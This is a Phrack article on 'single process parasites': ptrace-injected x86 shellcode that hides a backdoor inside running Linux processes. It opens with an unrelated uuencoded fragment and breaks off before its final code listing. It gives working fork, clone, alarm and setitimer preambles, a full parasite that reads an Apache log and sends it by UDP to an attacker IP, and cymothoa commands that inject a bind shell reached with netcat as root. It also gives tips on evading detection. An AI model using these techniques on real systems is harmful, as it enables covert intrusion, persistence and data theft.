M`BB#-Y*^TZ?18&].XV8$;R!5R_Z!';E)MD7_Q+NMV9RLJ:I_>EK%*K:?*&@)
M%TZJ;P?`=X,30BAQ$RE4<F'C=LHL[=SV5CJ;_:M21=&#(H[+A[91;T/U"Y1F
MHI!;;<#=V2)C4@@5*]&P+!74Y!C]XMNC;LCM':7;>B*9H4`Z*T(PWD-,3TZK
M=BM#2ZM\[A!K%F65,2'Q1J.1TNES!ZO6+K@G]TWF%>_NT*HG--U[C$/FC\SN
M.)'3\-"T(SW:T0%J*U!A2^@?'Q;Z50V&@S"ZR1-1@XY>S<T+==_8F6K*/,0;
MJ1A#LS9A#.P(FLS715OD^M4Q-+W8(33W3?>%G1?6:)_,?:T#+NJ^QF#*L9JH
M$%I6O1=\FWU_-@7W3(HR?T'.-K/JYJ>JFF/FV[^A^^G?__$=C:'K__$T^JZ>
M?]!/-*B;BG0#G8$WK#!+H@,QA(/XMXR<P#DCC2BNEC7ND@*WH,XGF_6&F-Z&
M7TX';(_%`SJUP5`>%%:B-X,;W%.:I9P.%+P>/#^>,%S(84@0`/S&2'57)SNP
M#*(>;>6I9]:B+B/L?$@-M[=U<?738S858X?*=S_99M]!'/(C*_Z+T.V-&/!S
M#8J.\2P%`W#O6C0_+KQ>_8[H9Q;Q_!-`W@.:-*T.$?!\IH92NLW>@'OKQ>>A
M]%6&9DV#-_5EQ::XN*PQ^M>Q#]@^TW37+B&-(7NU)%[&>G-_9-FAIKJ,U@_H
M]9S`828X/F^>#^F30OQ%"Q?OG9.*S+;9WUY_CX@`T:KH+TVCU%C8_-%G+/^?
MDX?_@D[23XS_6W`>&_Q?GN#Y7UIVYW]/D1YZ_K=VL@HF6%T:!3`/L8BNQ!O8
M#E3"S.XU()4\"-]%[Z)_".((B^6"0ON(OPKBH^[VF.$C_M_0_OC(HPO5QUW\
MUC!X\6A7,[<*0=@0A5I,$D.T"CO8$&5GO0!58:CREX(JL+D_\S;W:8-I1AB'
M)[1;_V%R`/V,D*^T$1K;^U62CBLZ;J&HFOU5J-/;AS/PAZH*C&TCLJR&7KS@
MB<64WGL[H?,`V:;$>&TPE2J"]#Y,N?*DFAF"-Q4C@:?6PR1"RW:Z!P]W(F$%
MM6@@TZA%TYEB-ENMZ5S1Y0\7*K,TC`^"5)DG5>%+-0I)-7:E&D?!KBH4TT6@
MJTI%4#Y<JMR72O"2>T(UMH%Y"Y3?B80!-%()_21Q4*J18GH4D&JL",:3R0.%
M*EJ$*CRA>!P\2E'"<$\8'NXCKM]U'@?DX>8UO]=[[CY<>J^4D*BTG_4.9JYK
MUI3'LA&NN6I:*]J:;WF1S!Y[B^FZPVIQ\S+XZC.LX2D"(^-E\;C*?,E'PERZ
MMNQ.G?LRINXX8`U;UG)0$@=%'3FBMM@T[P''MMTIJFOA'BQJYEHEV[S1J8F<
MD8V@25#0L=NG#2NWRLRIPZ0@IZ[->["<N2NG;_&2I-&A64A.R^;I#A5V+RRH
M8_GNDM.V@K]!3ML2XH3EF\&D,0\G15!2[K^E#[.*#5D]9AT#^7!92[=/2U_2
MXLXJ'`L)LB7A4T/KB-`^..R^L?]3D_?]#QNP3X[_FG.NO__CO,-_?<K4N++;
M_F&OT`"BWPLOMKLMU]V6DX7=;;GNMEQW6ZZ[+?>?=5ONCY[(N]2E+G6I2UWJ
M4I>ZU*4N=:E+7>I2E[K4I2YUJ4M=ZE*7NM2E+G6I2UWJ4I>ZU*4N=:E+7>K2
,?TWZ/VX96&``\```
`
end


--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13

|=-----------------------------------------------------------------------=|
|=---------------------=[ Single Process Parasite ]=---------------------=|
|=----------------=[ The quest for the stealth backdoor ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Crossbower ]=--------------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ 0. Introduction
------[ 1. Brief discussion on injection methods
------[ 2. First generation: fork() and clone()
------[ 3. Second generation: signal()/alarm()
------[ 4. Third generation: setitimer()
------[ 5. Working parasites
------------[ 5.1 Process and thread backdoor
------------[ 5.2 Remote "tail follow" parasite
------------[ 5.3 Single process backdoor
------[ 6. Something about the injector
------[ 7. Further readings
------[ 8. Links and references

------[ 0. Introduction

In biology a parasite is an organism that grows, feeds, and live in a
different organism while contributing nothing to the survival of its host.

(There is another interesting definition that, even if it's less relevant,
I find funny: a professional dinner guest, especially in ancient Greece.
>From Greek parastos, person who eats at someone else's table,
parasite : para-,beside; stos, grain, food.)

So, without digressing too much, what do we mean by "parasite" in this
document? A parasite is simply some executable code that lives within
another process, but that was injected after its loading time, by a
third person/program.

Any process can become infected quite easily, using standard libraries
provided by operating systems (we will use process trace, ptrace [0]).

The real difficulty for the parasite is to coexist peacefully with the host
process, without killing it. For "death" of the host we also intend a
situation where, even if the process remains active, it is no longer
able to work properly, because its memory has been corrupted.

The of goal this document is to create a parasite that live and let live
the host process, as if nothing had happened.

Starting with simple techniques, and and gradually improving the parasite,
we'll reach a point where our creature is scheduled inside the process of
the host, without the need of fork() or similar calls (i.e. clone()).

An interesting question is: why a parasite is an excellent backdoor?

The simplest answer is that a parasite hides what is not permitted in what
is allowed, so that:
  - it's difficult to detect using conventional tools
  - it's more stable and easy to use than kernel-level rootkits.

If the target system has security tools that automatically monitor the
integrity of executable files, but that do not perform complete audits of
memory, the parasite will not trigger any alarm.

After this introduction we can dive into the problematic.

If you prefer practical examples, you can "jump" to paragraph 5,
which shows three different types of real parasite.

------[ 1. Brief discussion on injection methods

To separate the creation of the shellcode from the methods used to inject
it into the host process, this section will discuss how the parasite is
injected (in the examples of this document).

Unlike normal shellcode that, depending on the vulnerability exploited,
can not contain certain types of characters (e.g. NULLs), a parasite has
no particular restrictions.

It can contain any character, even NULL bytes, because ptrace [0] allows to
modify directly the .text section of a process.

The first question that arises regards where to place parasitic code.
This memory location must not be essential to the program, and should not
be invoked by the code after the start (or shortly after the start) of
the host process.

We can use run-time patching, but it's complicated technique and makes it
difficult to ensure the correct functioning of the process after the
manipulation. It is therefore not suitable for complex parasites.

The author has chosen to inject the code into the memory range of libdl.so
library, since it is used during the loading stage of programs but then
usually no longer necessary (more info: [1][2]).

Another reason for this choice is that the memory address of the library,
when loaded into the process, is exported in the /proc filesystem.

You can easily see that by typing:
$ cat /proc/self/maps
...
b7778000-b777a000 rw-p 00139000 fe:00 37071197   /lib/libc-2.7.so
b777a000-b777d000 rw-p b777a000 00:00 0
...
b7782000-b779c000 r-xp 00000000 fe:00 37071145   /lib/ld-2.7.so  <---
...

Libdl is mapped at the range b7782000-b779c000 and is executable. The
injected starting at the initial address of the range is perfectly
executable.

Some considerations about this method: if the infected program uses
dlopen(), dlclose() or dlsym() during its execution, some problems
could arise. The solution is to inject into the same library, but in
unused memory locations.
(From the tests of the author the initial memory locations of the library
are not critical and do not affect the execution of programs.)

There are other problems on linux systems that use the grsec kernel patch.
Using this patch the text segment of the host process  is marked
read/execute only and therefore will not be writable with ptrace.
If that's your case, Ryan O'Neill has published a very powerful
algorithm [3] that exploits sysenter instructions (used by the host's code)
to execute a serie of system calls (the algorithm is able to
allocate and set the correct permission on a new memory area without
modifying the text segment of the traced process).
I recommend everyone read the document, as it is very interesting.

The other premise, I want to do in this section, regards the basic
informations the injector (the program that injects the parasite) must
provide to the shellcode to restore the execution of the host program.

Our implementation of the injector gets the current EIP (Instruction
Pointer) of the host process, push it on the stack and writes in the EIP
the address of the parasite (injected into libdl).

The parasite, in its initialization part, saves every register it uses.
Then, at the end of its execution, every modified register is restored.
A simple way to do this is to push and pop the registers with the
instructions PUSHA and POPA.

After that, a simple RET instruction restores the execution of the host
process, since the its saved EIP is on the top of the stack.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

parasite_skeleton:

    # preamble
    push %eax       # save registers
    push %ebx       # used by the shellcode

    # ...
    # shellcode
    # ...

    # epilogue
    pop %ebx        # restore modified registers
    pop %eax        # ...

    ret             # restore execution of the host

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Another very useful information the injector provides to the shellcode,
is the address of a persistent memory location. In the case of this
document, the address is also taken from /proc/pid/maps:

...
b7701000-b771c000 r-xp 00000000 08:03 1261592    /lib/ld-2.11.1.so
b771c000-b771d000 r--p 0001a000 08:03 1261592    /lib/ld-2.11.1.so
b771d000-b771e000 rw-p 0001b000 08:03 1261592    /lib/ld-2.11.1.so <--
...

The range b771d000-b771e000 has read and write permission and it's
suitable for this purpose.

Other techniques exists to dynamically create writable and executable
memory locations, such as the use of mmap() in the host process. But these
techniques are beyond the scope of this article and will not be analyzed
here.

Since the necessary premises have been made, we can discuss the first
generation of our stealth parasite.

------[ 2. First generation: fork() and clone()

The simplest idea to allow the host process to continue its execution
properly and, at the same time, hide the parasite, is the use of the
fork() syscall (or the creation of a new thread, not analyzed here).

Using fork() the process is splitted in two:
 - the parent process (the original one) can continue its normal execution
 - the child process, instead, will execute the parasite

An important thing to note, is that the child process inherits the parent's
name and a copy of its memory.

This means that if we inject the parasite in the process "server1",
another process "server1" will be created as its child.

Before the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
...

After the injection:
# ps -A
...
...
 5478 ?        00:00:00 server1
 5479 ?        00:00:00 server1
...

If the host process is carefully chosen, the parasite will be very hard
to detect. Just think of some network services (such as apache2) that
generate a lot of children: a single child process is unlikely to be
detected.

The fork parasite can be implemented as a preamble preceding the real
shellcode:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

fork_parasite:
    push %eax       # save %eax value (needed by parent process)

    push $2
    pop %eax
    int $0x80       # fork

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    pop %eax        # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The preamble simply makes a call to fork(), analyzes the results, and
decides the execution path to choose.

With this implementation, any existing shellcode can be turned into a
parasite: it's responsibility of the injector to concatenate the parts
before inserting them in the host.

A very similar technique uses clone() instead of fork(). We can consider
clone() a generalization of the fork() syscall through which it's possible
to create both processes and threads.

The difference is in the options passed to the syscall. A thread is
generated using particular flags:

  - CLONE_VM  the calling process and the child process run in the same
              memory space. Memory writes performed by the calling process
              or by the child process are also visible in the other
              process.
              Any memory mapping or unmapping performed by the child or
              the calling process also affects the other process.

  - CLONE_SIGHAND  the calling process and the child process share the same
                   table of signal handlers.

  - CLONE_THREAD  the child is placed in the same thread group as the
                  calling process.

The CLONE_THREAD flag is the most important: it is what distinguishes what
we call the "process" from what we call "thread" at least on linux systems.

Let's see how the clone() preamble is implemented:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

clone_parasite:
    pusha           # save registers (needed by parent process)

    # call to sys_clone

    xorl    %eax, %eax
    mov     $120, %al

    movl     $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
                            #        CLONE_THREAD|CLONE_PARENT

    int     $0x80           # clone

    test %eax, %eax
    jz shellcode    # child:  jumps to shellcode

    popa            # parent: restores host process execution
    ret

shellcode:          # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is based on the fork() preamble, and its behaviour is very
similar. The difference is in the result.

Before the injection (single threaded process):
# ps -Am
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
...

After the injection (an additional thread is created):
# ps -A
...
...
 8360 pts/3    00:00:00 server1
    - -        00:00:00 -
    - -        00:00:00 -
...

Surely the generation of a thread is more stealthy than the generation of a
process. However there is a small disadvantage, if the parasite thread
alters parts of the main thread can bring the host to a crash:
the use of the resources, that are shared, must be much more careful.

We have just seen how to create parasites executed as independent processes
or threads.

However, these types of parasites are not completely invisible. In some
circumstances, and in the case of particular (monitored) processes, the
generation of a child (process or thread) can be problematic or easily
detectable.

Therefore, in the next section, we will discuss in a different type of
parasite/preamble, deeply integrated with its host.

------[ 3. Second generation: signal()/alarm()

If we don't like the creation of another process to execute our parasite
we need some kind of time sharing mechanism inside a single process (did
you see the title of this document?)

It's a scheduling problem: when a new process is created, the operating
system takes care of assigning it time and resources necessary to its
execution.
If we don't want to rely on this mechanism, we have to simulate a scheduler
within a single process, to allow a concurrent execution of parasite and
host, using (usually) asynchronous events.

When you think of asynchronous events in a Unix-like system, the first
thing that comes to mind are signals.
If a process registers a handler for a specific signal, when the signal
is sent the operating system stops its normal execution and makes a
(void function) call to the handler.
When the handler returns, the execution of the process is restored.

There are several functions provided by the operating system to generate
signals. In this chapter we'll use alarm().

Alarm() arranges for a SIGALRM signal to be delivered to the calling
process when an arbitrary number of seconds has passed.
Its main limitation is that you can not specify time intervals shorter than
one second, but this is not a problem in most cases.

Our parasite/preamble needs to register itself as a handler for the signal
SIGALRM, and renew the timer every time it is executed, to be called at
regular intervals.
This creates a kind of scheduler within a single process, and there is no
the need to call fork() (or functions to create threads).

Here is our second generation parasite/preamble:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# signal/alarm parasite

handler:
    pusha
    # alarm(timeout)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov     $27, %al
    mov     $0x1, %bl    # 1 second
    int     $0x80

schedule:
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    schedule_end   # load schedule_end address
load_handler:
    pop    %ecx
    subl    $0x23, %ecx   # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

schedule_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

Of course the type of shellcode you can append to the preamble must
be aware of the "alternative" scheduling mechanism.

It must be able to split its operations between multiple calls, and must
also not take too much time to run a single step (i.e. a single call),
to not slow down the host program or overlap with the next handler call.

In short, a call to the handler (our parasite), to work properly must last
less than the timer interval.

However, alert() is not the only function able to simulate a scheduler.
In the next chapter we will see a more advanced function, which allows a
more granular control of the execution of the parasite.

------[ 4. Third generation: setitimer()

We've just arrived at the latest generation of the parasite.
In the first part of the chapter we'll spend some time to analyze the
function setitimer(), on which the code is based.

The definition of the function is:
int setitimer(int which, const struct itimerval *new_value,
                     struct itimerval *old_value);

As in the case of alarm(), the function setitimer() provides a mechanism
for a process to interrupt itself in the future using signals.
Unlike alarm, however, you can specify intervals of a few microseconds and
choose various types of timers and time domains.

The argument "int which" allows to choose the type of timer and therefore
the signal that will be sent to the process:

ITIMER_REAL    0x00  the most used timer, it decrements in real time, and
                     delivers SIGALRM upon expiration.

ITIMER_VIRTUAL 0x01  decrements only when the process is executing, and
                     delivers SIGVTALRM upon expiration.

ITIMER_PROF    0x02  decrements both when the process executes and when the
                     system is executing on behalf of the process. Coupled
                     with  ITIMER_VIRTUAL, this timer is usually used to
                     profile the time spent by the application in user and
                     kernel space.  SIGPROF is delivered upon expiration.

We will use ITIMER_REAL because it allows the generation of signal at
regular intervals, and is not influenced by environmental factors such as
the workload of a system.

The argument "const struct itimerval *new_value" points to an itimerval
structure, defined as:

struct itimerval {
    struct timeval it_interval; /* next value */
    struct timeval it_value;    /* current value */
};

struct timeval {
    long tv_sec;                /* seconds */
    long tv_usec;               /* microseconds */
};

The last timeval structure, it_value, is the period between the calling of
the function and the first timer interrupt. If zero, the alarm is disabled.

The second one, it_interval, is the period between successive timer
interrupts. If zero, the alarm will only be sent once.

We'll set both structures at the same time interval.

The last argument, "struct itimerval *old_value", if not NULL, will be set
by the function at the value of the previous timer. We'll not use this
feature.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

# setitimer parasite

setitimer_hdr:
    pusha
    # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    xorl    %edx, %edx
    mov     $104, %al
    jmp     struct_itimerval # load itimervar structure
load_struct:
    pop     %ecx
    int     $0x80
    popa
    jmp     handler

struct_itimerval:
    call    load_struct
    # itimerval structure: you can modify the values
    # to set your time intervals
    .long    0x0       # seconds
    .long    0x5000    # microseconds
    .long    0x0       # seconds
    .long    0x5000    # microseconds

# signal handler, called by the timer
handler:
    pusha
    # signal(SIGALRM, handler)
    xorl    %eax, %eax
    xorl    %ebx, %ebx
    mov    $48, %al
    mov    $14, %bl
    jmp    handler_end   # load handler_end address
load_handler:
    pop    %ecx
    subl    $0x19, %ecx  # adjust %ecx to point handler()
    int    $0x80
    popa
    jmp    shellcode

handler_end:
    call load_handler

shellcode:        # append your shellcode here
    # ...
    # ...

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The usage of this preamble is similar to the previous (alarm) one, there
is only the necessity of a fine-tuned timer: a compromise between the
frequency of executions and the stability of the parasite, which must be
able to carry out its operations in less time than a timer's cycle.

You can work around this problem by transforming these preambles
(including the preamble that makes use of alarm()) in epilogues, so that
the timer starts counting only after the parasite has finished its
operations.

In fact we are going to see how this was implemented in the real parasites
presented below.

------[ 5. Working parasites

Here we come to the practical part. Three working parasites will be
presented: one for each technique exposed in the theoretical part of the
document.

To inject the parasites the injector cymothoa [4] was used, written by the
same author, and which already includes the codes presented in the article.
Although it is possible, through various techniques, to inject shellcodes
in processes, the download of the program is recommended to try the
examples during the lecture.

------------[ 5.1 Process and thread backdoor

Our first real parasite is a backdoor created by applying, to pre-existing
shellcode, the fork() preamble.
The shellcode used was developed by izik (izik@tty64.org) and is
available on several sites [5]. For this reason will not be reported.

The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
port and fork a shell for every connection.

Using it aided by an injector, has several advantages:
  - The ability to configure its behavior. In this case the possibility to
    choose the port to listen on.
  - The possibility of keeping the host alive using a one of the
    preamble shown earlier.
  - Not having to worry about memory locations necessary to the execution
    and data storage, since they are automatically provided.

Let's see in practice how this parasite works...

First, on the victim machine, we must identify a suitable host process.
In this example we will use an instance of cat, since it's really easy to
check if it continues its execution after the injection.

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat

We need this pid for the injection:

root@victim# cymothoa -p 1727 -s 1 -y 5555
[+] attaching to process 1727

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbf81e1c8   eip value: 0xb78be430
 ------------------------------------------------------------

[+] new esp: 0xbf81e1c4
[+] payload preamble: fork
[+] injecting code into 0xb78bf000
[+] copy general purpose registers
[+] detaching from 1727

[+] infected!!!
root@victim#

The process is now infected: we should be able to see two cat instances,
the original one and the new one that corresponds to the parasite:

root@victim# ps -A | grep cat
 1727 pts/6    00:00:00 cat
 1842 pts/6    00:00:00 cat

If, from a different machine, we try to connect to the port 5555, we should
get a shell:

root@attacker# nc -vv victim 5555
Connection to victim 5555 port [tcp/*] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
whoami
root

At the same time, if we write a few lines in the console where the original
cat is running, we should see the usual output:

root@victim# cat
test123
test123
foo
foo

The backdoor function properly: the two processes are running at the same
time without crashing...

The same backdoor can also be injected in a similar way using the clone()
preamble, and thus running the parasite as a new thread instead of a new
process.

The command is similar, we only disable the fork() preamble and force
clone() instead:

root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
[+] attaching to process 9425

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfb4beb8   eip value: 0xb78da430
 ------------------------------------------------------------

[+] new esp: 0xbfb4beb4
[+] payload preamble: thread
[+] injecting code into 0xb78db000
[+] copy general purpose registers
[+] detaching from 9425

[+] infected!!!

If we execute ps without special flags we now see only one process:

root@victim# ps -A | grep cat
 9425 pts/3    00:00:00 cat

But with the option -m we see an additional thread:

root@victim# ps -Am
...
 9425 pts/3    00:00:00 cat
    - -        00:00:00 -
    - -        00:00:00 -
...
...

Using netcat on the port 5555 of the victim machine works as expected.

Some notes on the proper use of the fork() and clone() preambles:
  - This preamble is compatible with virtually any existing shellcode,
    without any modification. It can be used to easily transform into
    parasitic code what you have already written.
    In the case of clone() preamble the situation is slightly more critical
    because there is the possibility that the parasite thread interferes
    with the host thread. However, widespread shellcodes are usually
    already attentive to these issues, and should not cause problems.
  - It is better to inject the parasite into servers that generate many
    child processes. Some of those tested by me are apache2, dhclient3 and,
    in the case of a desktop system, the processes of the window manager.
    It's hard to find a needle in a haystack, and it is difficult to tell
    a single parasite from dozens of apache2 processes ;)

------------[ 5.2 Remote "tail follow" parasite

Have you ever used tail with the "-f" (follow)  option? This mode is used
to monitor text files, usually logs, to see in real time the new lines
added by other processes.

Tail accepts as option a sleep interval, a waiting time between a
control of the file and another.

It's therefore natural, when writing a parasite with the same function, to
use a preamble that allows a precise control of time: the setitimer()
preamble.

This is the code of this new parasite... It is more complex than the
previous codes.
After the source there will be a brief explanation of its operations, and
finally an example of its practical use.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<

#
# Scheduled tail setitimer parasite
#

#
# Preamble
#

setitimer_hdr:
	pusha
	# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
	xorl    %eax, %eax
	xorl    %ebx, %ebx
	xorl    %edx, %edx
	mov     $104, %al
	jmp     struct_itimerval
load_struct:
	pop	%ecx
	int	$0x80
	popa
	jmp	handler

struct_itimerval:
	call	load_struct
	# these values are replaced by the injector:
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds
	.long   0x0#53434553  # seconds
	.long   0x5343494d  # microseconds

handler:
	pusha
	# signal(SIGALRM, handler)
	xorl	%eax, %eax
	xorl	%ebx, %ebx
	mov	$48, %al
	mov	$14, %bl
	jmp	handler_end
load_handler:
	pop	%ecx
	subl	$0x19, %ecx # adjust %ecx to point handler()
	int	$0x80
	popa
	jmp	shellcode

handler_end:
	call load_handler
#
# The shellcode starts here
#

shellcode:
	pusha

	# check if already initialized
	mov     $0x4d454d50, %esi  # replaced by the injector
                                   # (persistent memory address)
	mov     (%esi), %eax
	cmp     $0xdeadbeef, %eax
	je      open_call          # jump if already initialized

	# initialize
	mov     $0xdeadbeef, %eax
	mov     %eax, (%esi)
	add     $4, %esi
	xorl    %eax, %eax
	mov     %eax, (%esi)
	sub     $4, %esi

open_call:
	# call to sys_open(file_path, O_RDONLY)
	xorl    %eax, %eax
	mov     $5, %al
	jmp     file_path
load_file_path:
	pop     %ebx
	xorl    %ecx, %ecx
	int     $0x80       # %eax = file descriptor
	mov     %eax, %edi  # save file descriptor

check_file_length:
	# call to sys_lseek(fd, 0, SEEK_END)
	mov     %edi, %ebx
	xorl    %eax, %eax
	mov     $19, %al
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $2, %dl
	int     $0x80  # %eax = end of file offset (eof)

	# get old eof, and store new eof
	add     $4, %esi
	mov     (%esi), %ebx
	mov     %eax, (%esi)

	# skip the first read
	test    %ebx, %ebx
	jz      return_to_main_proc

	# check if file is larger
	# (current end of file > previous end of file)
	cmp     %eax, %ebx
	je      return_to_main_proc # eof not changed:
                                    # return to main process

calc_data_len:
	# calculate new data length
	# (current eof - last eof)
	mov     %eax, %esi
	sub     %ebx, %esi # saved in %esi

set_new_position:
	# call to sys_lseek(fd, last_eof, SEEK_SET)
	xorl    %eax, %eax
	mov     $19, %al
	mov     %ebx, %ecx
	mov     %edi, %ebx
	xorl    %edx, %edx
	int     $0x80  # %eax = last end of file offset

read_file_tail:
	# allocate buffer
	sub     %esi, %esp

	# call to sys_read(fd, buf, count)
	xorl    %eax, %eax
	mov     $3, %al
	mov     %edi, %ebx
	mov     %esp, %ecx
	mov     %esi, %edx
	int     $0x80       # %eax = bytes read
	mov     %esp, %ebp  # save pointer to buffer

open_socket:
	# call to sys_socketcall($0x01 (socket), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x01, %bl
	jmp     socket_args
load_socket_args:
	pop     %ecx
	int     $0x80  # %eax = socket descriptor
	jmp     send_data

socket_args:
	call load_socket_args
	.long	0x02	# AF_INET
	.long	0x02	# SOCK_DGRAM
	.long	0x00	# NULL

send_data:

	# prepare sys_socketcall (sendto) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	xorl    %ecx, %ecx
	push    %ecx    # flags
	push    %edx    # buffer len
	push    %ebp    # buffer pointer
	push    %eax    # socket descriptor

	# call to sys_sendto($11 (sendto), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $11, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     restore_stack

struct_sockaddr:
	call load_sockaddr
	.short	0x02        # AF_INET
	.short	0x5250      # PORT (replaced by the injector)
	.long	0x34565049  # DEST IP (replaced by the injector)

restore_stack:
	# restore stack
	pop     %ebx    # socket descriptor
	pop     %eax    # buffer pointer
	pop     %edx    # buffer len
	pop     %eax    # flags
	pop     %eax    # struct_sockaddr address
	pop     %eax    # sizeof(struct_sockaddr)

	# deallocate buffer
	add     %edx, %esp


close_socket:
	# call to sys_close(socket)
	xorl    %eax, %eax
	mov     $6, %al
	int     $0x80

return_to_main_proc:

	# call to sys_close(fd)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edi, %ebx
	int     $0x80

	# return
	popa
	ret

file_path:
	call load_file_path
	.ascii  "/var/log/apache2/access.log"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The code is not written in a super-compact way, since the space it's not
a problem and the ease of programming and modification has been preferred.

The code can be summarized in a few steps:
1) Preable (we already know).
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
3) File open and check of length.
4) Comparison with previous file's length.
4.1) If unchanged the parasite returns the execution to the host process.
4.2) If changed the execution continues.
5) Read the new lines of the file.
6) Send the new lines to the attacker via UDP
7) Restore the stack
8) Return the execution to the host process.

The shellcode receives several parameters from the injector: the address
of a persistent memory location, the attacker IP address and port, and the
microsecond interval for the timer.

The injector simply replaces known hexadecimal mark with these parameters
during the injection. You can see where the replacements occur looking
at the comments of the code.

Now on to the fun part: the practical use of the parasite.

The first thing to do is to prepare the server on the attacker's machine
to receive data. Inside the main directory of the injector is present a
simple implementation of UDP server.

You need only to specify an available port:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555

Now we can move to the victim's machine, and choose suitable process.
For simplicity we will use cat again.

To inject the parasite we must specify some parameters:

root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
[+] attaching to process 4694

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0x0
 esp value: 0xbfa9f3f8   eip value: 0xb77e8430
 ------------------------------------------------------------

[+] new esp: 0xbfa9f3f4
[+] injecting code into 0xb77e9000
[+] copy general purpose registers
[+] persistent memory at 0xb7805000 (if used)
[+] detaching from 4694

[+] infected!!!

The process is now infected. No new process has been created.

Now, assuming an apache2 server is running, we can try to make some
requests to the server to update /var/log/apache2/access.log (the file
we are monitoring).

root@attacker# curl victim_ip
<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added.</p>
</body></html>

If everything worked properly we should see, in the console of the UDP
server UDP, the new lines generated by our requests:

root@attacker# ./udp_server 5555
./udp_server: listening on port UDP 5555
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
zlib/1.2.3.3 libidn/1.15"
...

Et voila, we have a remote file sniffer!

Of course the connections do not appear in the output of tools like
netstat, as they are only brief exchanges of data, and sockets are open
only when the monitored file has new lines (and immediately closed).

Some notes on the proper use of this preamble and parasite:
  - This preamble is usually not compatible with virtually existing
    shellcode. The code must be modified to return the execution to the
    host process, restoring stack and registers.
  - It is better to inject the parasite into servers that run all the time
    the machine is on, but do not use processor very much. The server
    dhclient3 is a perfect host.

------------[ 5.3 Single process backdoor

We have just arrived at the last and perhaps most interesting example of
parasite of this document.
That's what the author wanted to obtain: a backdoor that can live within
another process, without calls to fork() and without creating new threads.

The backdoor listens on a port (customizable by the injector), and
periodically checks if a client is connected. This part has been
implemented using nonblocking sockets and a modified alarm() preamble.

When a client is connected, it obtains a shell: the only time a call
to fork() is made.

As long as the backdoor is in listening mode, the only way to notice its
presence is to check the listening ports on the machine, but even in this
case we can use some tricks to make our parasite very difficult to detect.

Here's the code.

